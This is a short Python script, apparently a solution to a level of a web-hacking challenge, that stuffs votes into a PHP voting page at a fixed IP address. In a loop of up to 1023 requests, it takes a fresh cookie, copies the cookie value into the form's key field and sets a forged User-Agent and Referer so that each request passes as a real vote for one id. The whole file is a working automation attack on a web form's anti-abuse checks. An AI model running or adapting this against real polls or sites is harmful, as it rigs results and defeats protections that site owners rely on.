#!/usr/bin/python3

import requests

url = 'http://158.69.76.135/level2.php'
my_id = 247
current_votes = 1
for i in range(1, 1024 - current_votes + 1):
    r1 = requests.post(url)
    cookie_key = r1.cookies.values()[0]
    data = {
            'id': my_id,
            'holdthedoor': 'Submit',
            'key': cookie_key
    }
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; Win64; x64)',
               'Referer': url}
    r2 = requests.post(url, data=data, cookies=r1.cookies, headers=headers)
